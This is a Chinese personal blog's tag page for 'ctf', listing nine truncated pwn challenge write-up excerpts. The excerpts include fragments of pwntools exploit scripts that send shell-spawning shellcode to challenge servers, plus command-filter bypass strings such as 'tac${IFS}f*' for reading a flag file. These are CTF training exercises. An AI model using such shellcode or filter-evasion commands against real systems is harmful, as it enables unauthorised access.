tag

ctf

该标签下共 9 篇文章。

第八届玄武杯pwn方向_are_you_lucky_wp

由于是第一次作为出题人,有许多不足的地方,比如这题忘记关相应输出了,导致 fmt 可以 leak,从而绕过随机数(QWQ)。 开启了 PIE 保护,关闭了 NX 保护,大概率能打 shellcode,拖入 IDA 里面看。 login先是一个登录,输入 user_name 与 114514 编码后的结果。熟悉的师傅应该能看出是 Base64 编码,不熟悉的师傅可以通过 gdb ...

ISCTF2024

PwnNetcat通过题目描述可以知道,这是一道nc题目,那就直接连接一下看看 easy pwn!just have funISCTF{5033fc9a-b09c-4fd3-8551-0cb22283d299} OK,直接给flag,那就没什么说的了。 girlfriend先看一下开启了哪些保护 [*] '/mnt/d/国内赛/ISCTF2024/...

MoeCTF_2025

PWN前面的几道题是基础的题目,就不再赘述了 boom/boom_revengefrom pwn import*io=remote('61.139.2.1',56079)#io=process('./boom')recv_data=os.popen('./random').read()list=recv_da...

XYCTF2024

hello_world(签到) 开启了pie保护,但是可以泄漏地址,而且存在栈溢出,因此可以先泄漏libc,再打ret2libc。 from pwn import*libc=ELF('./hello_worldlibc.so.6')elf=ELF('./hello_world')io=remote('challenge.imxb...

nss刷题记录

singout一道nc连接的题目,主要是禁用了一些获取flag的指令。借鉴了一些wp,有以下方法: tac${IFS}f*tac$IFS$9f*nl${IFS}f*nl$IFS$9f*tail ./*tail$IFS$9./f* 感觉挺奇特的 [NISACTF 2022]ezheap 这里申请了两个堆块s与command,存在gets函数...

GeekChallenge2024

ez_shellcode简单的shellcode from pwn import*context.arch='amd64'io=remote('nc1.ctfplus.cn',39373)shellcode_addr=0x0401256shellcode=asm(shellcraft.sh())io.send(shellcode)payl...

XYNU2024信安杯

全是简单题目,直接上exp NC直接nc连接,然后ls+cat flag即可。 shellcodefrom pwn import*context.arch='amd64'io=remote('gz.imxbt.cn',20029)shellcode=asm(shellcraft.sh())io.sendline(shellcode)io....

0xGame2024-复现

where_is_my_binsh 一道简单的题目,存在栈溢出以及system函数,没有/bin/sh\x00字符串,给了变量something的地址,那么就先输入/bin/sh\x00字符串再打ret2text。 from pwn import*io=remote('gz.imxbt.cn',20884)elf=EL...

2025SQCTF

很荣幸参加了第四届SQCTF,作为新生赛,难度还可以,因为本人能力还不够,并没能够akpwn,还得再努力努力(毕竟是想打XCTF的,这点实力是肯定不行的。 浅红欺醉粉,肯信有江梅一道简单到不能再简单的nc签到题。 领取你的小猫娘这是一道64位的题,基本没开什么保护。 这里可以看到有一个后门函数,其判断条件为v5的值为真,因为我们能输入的是v4,而且观察栈上结构可以知道地址相差0...

haoo@blog:~
Startrace interactive shell v1.0
输入 help 查看命令,按 Ctrl K 随时打开。

help · ls · cd · open · search · clear